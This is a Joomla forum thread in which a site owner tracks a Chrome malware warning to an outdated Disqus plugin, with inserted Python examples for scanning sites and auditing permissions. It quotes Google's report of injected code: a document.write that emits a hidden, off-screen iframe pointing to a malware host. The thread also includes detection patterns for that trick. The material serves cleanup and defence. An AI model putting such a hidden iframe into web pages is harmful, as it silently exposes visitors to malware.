Google Chrome has blocked access...

Post by the-muse » Sat Jan 19, 2013 10:48 am

Hello Forum:

Using Joomla! 1.5. I've had the Disqus plugin installed on the site for over a year. Within the past couple of months, when attempting to visit the site, a Google Chrome warning appears instead:

"The Website Ahead Contains Malware!

Google Chrome has blocked access to http://www.taking on.net for now.
Even if you have visited this website safely in the past, visiting it now is very likely to infect your computer with malware. Malware is malicious software that causes things like identity theft, financial loss, and permanent file deletion. Learn more"

When I followed the "learn more" to investigate, the so-called "malware" was a Disqus JavaScript file. The site worked fine for a couple of years.

The site's splash page is located at: http://www.taking on.net

Anyone have any ideas what's happening here? :eek: I would prefer to continue to use Disqus, since it's become very popular web-wide. Many thanks in advance.
Last edited by mandville on Sat Jan 19, 2013 11:38 pm, edited 1 time in total.
Reason: broke links for security reasons,

Post by Slackervaara » Sat Jan 19, 2013 12:29 pm

Run the Forum Post Assistant and post the output here, so we can see if you have any security holes.
http://forum.joomla.org/viewtopic.php?f=432&t=586336
Google safe browsing says your site has malware:
http://safebrowsing.clients.google.com/ ... kingon.net

Post by the-muse » Sat Jan 19, 2013 10:17 pm

Here is the FPA output. Thank you:
Forum Post Assistant (v1.2.3) : 19th January 2013
Problem Description :: Google Chrome has blocked access
Log/Error Message :: The Website Ahead Contains Malware!
Actions Taken To Resolve :: Google safe browsing says your site has malware:
http://safebrowsing.clients.google.com/ ... kingon.net

Basic Environment ::
Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Read-Only (644) | Owner: takingon (uid: 1/gid: 1) | Group: takingon (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-194.26.1.el5 | Technology: i686 | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 | Encoding: gzip,deflate,sdch | Doc Root: /home/takingon/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.13 | PHP API: apache2handler | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: /home/takingon:/usr/lib/php:/usr/local/lib/php:/tmp | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 32M

MySQL Configuration :: Version: 5.0.96-community (Client:5.0.96) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 2.80 MiB | #of Tables:  41

Detailed Environment ::
PHP Extensions :: date (5.2.13) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | standard (5.2.13) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | imap () | SPL (0.2) | mysqli (0.1) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.8.11) | apache2handler () | timezonedb () | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: iconv | suhosin |

Switch User Environment (Experimental) :: PHP CGI: No | Server SU: No | PHP SU: No | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No

Apache Modules :: core | mod_access | mod_auth | mod_include | mod_deflate | mod_log_config | mod_logio | mod_env | mod_expires | mod_headers | mod_unique_id | mod_setenvif | mod_proxy | proxy_connect | proxy_ftp | proxy_http | mod_ssl | prefork | http_core | mod_mime | mod_status | mod_autoindex | mod_asis | mod_info | mod_suexec | mod_cgi | mod_negotiation | mod_dir | mod_imap | mod_actions | mod_userdir | mod_alias | mod_rewrite | mod_so | mod_auth_passthrough | mod_bwlimited | mod_fpcgid | mod_evasive20 | mod_php5 | mod_security2 | Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 |
Potential Missing Modules :: mod_security | mod_evasive | mod_dosevasive | mod_qos | mod_userdir |

Folder Permissions ::
Core Folders :: images/ (777) | components/ (777) | modules/ (777) | plugins/ (777) | language/ (777) | templates/ (777) | cache/ (777) | logs/ (777) | tmp/ (777) | administrator/components/ (777) | administrator/modules/ (777) | administrator/language/ (777) | administrator/templates/ (777) |

Elevated Permissions (First 10) :: tmp/ (777) | wiki/backups/ (777) | wiki/db/ (777) | wiki/dump/ (777) | wiki/img/wiki/ (777) | wiki/styles/ (777) | wiki/temp/ (777) | wiki/temp/cache/ (777) | wiki/templates/ (777) | wiki/whelp/ (777) |

Extensions Discovered ::
Components :: SITE :: User (1.5.0) | Wrapper (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Content Page (1.5.0) | Newsfeeds (1.5.0) | Polls (1.5.0) | User Manager (1.5.0) | Messaging (1.5.0) | JaggyBlog (1.2.0) | Cache Manager (1.5.0) | Mass Mail (1.5.0) | Banners (1.5.0) | Language Manager (1.5.0) | Module Manager (1.5.0) | JCE (1.5.7.4) | Control Panel (1.5.0) | Trash (1.0.0) | Media Manager (1.5.0) | Contact Items (1.0.0) | Installation Manager (1.5.0) | Configuration Manager (1.5.0) | Template Manager (1.5.0) | Plugin Manager (1.5.0) | Menus Manager (1.5.0) | Frontpage (1.5.0) | Weblinks (1.5.0) | AlphaRegistration (2.0.12) | Search (1.5.0) |

Modules :: SITE :: Blog Categories (1.0.0) | Login (1.5.0) | Latest News (1.5.0) | Most Read Content (1.5.0) | Custom HTML (1.5.0) | Banner (1.5.0) | Statistics (1.5.0) | Newsflash (1.5.0) | Random Image (1.5.0) | Wrapper (1.0.0) | Feed Display (1.5.0) | Syndicate (1.5.0) | Who\'s Online (1.0.0) | Breadcrumbs (1.5.0) | Latest Comments (1.0.0) | Latest Blog Posts (1.0.0) | Related Items (1.0.0) | Poll (1.5.0) | Footer (1.5.0) | Archived Content (1.5.0) | Menu (1.5.0) | Search (1.0.0) | Sections (1.5.0) |
Modules :: ADMIN :: Login Form (1.0.0) | User Status (1.5.0) | Latest News (1.0.0) | Custom HTML (1.5.0) | Title (1.0.0) | Popular Items (1.0.0) | Items Stats (1.0.0) | Admin Menu (1.0.0) | Admin Submenu (1.0.0) | Toolbar (1.0.0) | Feed Display (1.5.0) | Logged in Users (1.0.0) | Quick Icons (1.0.0) | Online Users (1.0.0) | Footer (1.0.0) | Unread Items (1.0.0) |

Plugins :: SITE :: Button - Pagebreak (1.5) | Button - Image (1.0.0) | Button - Readmore (1.5) | Content - Example (1.0) | Content - Page Navigation (1.5) | Content - Pagebreak (1.5) | Content - Email Cloaking (1.5) | AllVideos (by JoomlaWorks) (3.3) | Content - Vote (1.5) | Disqus Comment System for Joom (2.2) | Content - ChronoComments (1.2) | Content - Load Modules (1.5) | Content - Code Highlighter (Ge (1.5) | Paste (1.5.7.4) | Advanced Link (1.5.7.4) | Joomla! Links for Advanced Lin (1.2.1) | Zoo2 Links for Advanced Link (1.0.0) | Media Object support (1.5.7.4) | File Browser (1.5.7.4) | JCE SPELLCHECKER TITLE (1.5.7.4) | Paste (1.5.7.4) | Image Manager (1.5.7.4) | Advanced Code Editor (1.5.7.4) | Editor - JCE 1.5.7.4 (1.5.7.4) | Editor - XStandard Lite for Jo (1.0) | Editor - TinyMCE 3 (3.2.6) | User - Example (1.0) | User - Joomla! (1.5) | System - Remember Me (1.5) | System - Legacy (1.5) | System - Cache (1.5) | System - JCE MediaBox (1.0.10) | System - Log (1.5) | System - Backlinks (1.5) | System - Mootools Upgrade (1.5) | System - SEF (1.5) | System - Debug (1.5) | System - AlphaRegistration (2.0.10) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - OpenID (1.5) | Authentication - Joomla (1.5) | Authentication - GMail (1.5) | Search - Newsfeeds (1.5) | Search - Weblinks (1.5) | Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Content (1.5) |

Templates Discovered ::
Templates :: SITE :: beez (1.0.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |

Post by mandville » Sat Jan 19, 2013 11:40 pm

initial view.
out of date joomla
out of date extensions
open folder permissions
no htaccess file
review and action http://docs.joomla.org/Security_Checklist_7
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Post by the-muse » Sun Jan 20, 2013 5:03 pm

Thank you.

Post by the-muse » Tue Jan 22, 2013 8:25 pm

P.S. - As a follow up to this issue for anyone else who may have this problem, I removed the Disqus plugin from the Joomla site in question, sent Google a request to review the site, and the problem was resolved. It was a Joomla plugin which was responsible. Although running the Forum Post Assistant and posting the output here to see if there were any security holes may be a routine action for solving problems here, the output and resulting response did not solve the problem, and really had nothing to do with the problem. The problem was in the Joomla Disqus plugin. Once that was removed, the problem disappeared.

I appreciate your taking the time to look at the output of the FPA. However, I hope you realize that it wasn't really necessary to get the solution to this problem.

Sent to Google 1-21-13

The following two files were part of a Joomla 1.5 Disqus commenting plugin. I have removed the plugin, and the files no longer exist at this site.

Thank you for bringing this to my attention. Please review, and if found clean, remove the warning.
Here is the code found within the Disqus plugin JavaScript:
Last checked: December 10, 2012
When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

Suspected injected code
document.write('<iframe width="50" height="50" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="http://vadoonief.qhigh .com/nighttrend.cgi?8"></iframe>');

Type Code Injection
Instances 1 or more
Google reviewed the site after removal of the Disqus plugin, and within a few hours, the warning was removed. I hope this helps anyone else who may have this problem.

The site was built with Joomla 1.5, installed automatically through "Fantastico" on a cPanel server. Upgrading 1.5 to the latest version is a nightmare, so I may just copy all the articles and install a fresh New Joomla.

Best wishes to all. Joomla is OUTSTANDING!
Last edited by mandville on Tue Jan 22, 2013 9:41 pm, edited 1 time in total.
Reason: broke link
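
Added example, not part of the original thread and not Disqus or Joomla code: a Python scan for the pattern Google reported above, a `document.write()` that emits an `<iframe>` styled to stay out of sight. The sample string is constructed and its host name is a placeholder; `scan_text` and `scan_tree` are names chosen here.

```python
import os
import re

# document.write() called with one quoted string literal (concatenated or
# encoded strings are out of scope for this check).
DOC_WRITE = re.compile(
    r"document\.write\s*\(\s*(['\"])(?P<html>(?:\\.|(?!\1)[^\\])*)\1\s*\)",
    re.IGNORECASE | re.DOTALL)
# Styling that keeps a frame out of the visitor's sight.
HIDING = {
    "off-screen position": re.compile(r"\b(?:left|top)\s*:\s*-\d", re.I),
    "display:none": re.compile(r"display\s*:\s*none", re.I),
    "visibility:hidden": re.compile(r"visibility\s*:\s*hidden", re.I),
    "0/1px size": re.compile(r"\b(?:width|height)\s*[:=]\s*[\"']?[01](?:px)?\b", re.I),
}
SRC = re.compile(r"src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

def scan_text(text):
    """Return one finding per document.write() that emits a hidden iframe."""
    findings = []
    for m in DOC_WRITE.finditer(text):
        html = m.group("html")
        reasons = [name for name, rx in HIDING.items() if rx.search(html)]
        if "<iframe" not in html.lower() or not reasons:
            continue  # visible embeds such as video players are not reported
        src = SRC.search(html)
        findings.append({"line": text.count("\n", 0, m.start()) + 1,
                         "reasons": reasons,
                         "src": src.group(1) if src else None})
    return findings

def scan_tree(root, exts=(".js", ".php", ".html", ".htm")):
    """Scan every script or markup file under a site directory."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report

# Constructed sample shaped like the reported snippet; the host is a placeholder.
SAMPLE = ("var a = 1;\n"
          "document.write('<iframe width=\"50\" height=\"50\" style=\"width:\n"
          "100px;height:100px;position:absolute;left:-100px;top:0;\" src\n"
          "=\"http://injected.example/x.cgi?8\"></iframe>');\n")
```

Run `scan_tree()` against a copy of the document root; each hit gives the file, the line where the `document.write` starts, and the frame's `src` for comparison with a clean copy of the extension.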

Post by mandville » Tue Jan 22, 2013 9:45 pm

the fpa has highlighted that you are not running suphp which can cause major issues and be a security risk. that is also why you have 777 folder permissions, you are also not using a hta file

regarding the Disqus plugin, if you have a copy then send it to the vel team if it's a current item and they will deal with it as needed.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Post by the-muse » Tue Jan 22, 2013 10:28 pm

Yes. I have changed folder permissions manually. I do have an .htaccess file. The bottom of the file shows this:
########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
The Disqus plugin came from a Joomla plugin site. I removed it from my site. I later found that Disqus offers instructions for its use with Joomla at: http://disqus.com/admin/joomla/ . From that page, the link to the download is: http://extensions.joomla.org/extensions/5259/details

I have decided not to use Disqus with this Joomla site. As I stated before, I plan on copying the articles at my site, upgrading to 2.5, then staying with the JaggyBlog extension for comments.

Thanks again.

Post by mandville » Tue Jan 22, 2013 10:36 pm

Make sure you rename htaccess.txt to .htaccess
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
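
Added example, not part of the original thread: a Python check for the two findings raised in the replies above, world-writable (777) folders and an `htaccess.txt` that was never renamed to `.htaccess`. `audit_site` is a name chosen here; point it at the site's document root.

```python
import os
import stat


def audit_site(root):
    """Report world-writable directories and the state of the .htaccess file."""
    world_writable = []
    for dirpath, dirs, _files in os.walk(root):
        for d in dirs:
            full = os.path.join(dirpath, d)
            mode = os.lstat(full).st_mode  # lstat: symlinked dirs are skipped
            if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
                world_writable.append(
                    (os.path.relpath(full, root), oct(stat.S_IMODE(mode))[2:]))
    has_active = os.path.isfile(os.path.join(root, ".htaccess"))
    has_template = os.path.isfile(os.path.join(root, "htaccess.txt"))
    return {
        "world_writable_dirs": sorted(world_writable),
        "htaccess_active": has_active,
        # htaccess.txt present without .htaccess: the rename was never done
        "htaccess_not_renamed": has_template and not has_active,
    }
```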

Post by the-muse » Wed Jan 23, 2013 5:50 am

I've already done that. I had .htaccess before I ran the FPA, but I changed the name because I thought it might have been Google's problem.

I hope we learned something here.

Thanks again.

Post by mandville » Wed Jan 23, 2013 8:48 am

the plugin shown in your fpa is 2.2 - the plugin listed in the jed is 3.2 (last update on Nov 6, 2012)
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Post by the-muse » Wed Jan 23, 2013 3:31 pm

And? I already know the plugin shown in the fpa is from an earlier date than the one now listed at the jed. I installed the older plugin long before the 3.2 was available. Apparently the older plugin had a security issue.

There's really no need to continue this discussion. From my perspective, you really didn't do anything to solve my problem. You never once even addressed the subject of my initial post here. You still haven't.

But thank you for responding at all. That's more than I've seen at some forums.

Best wishes.

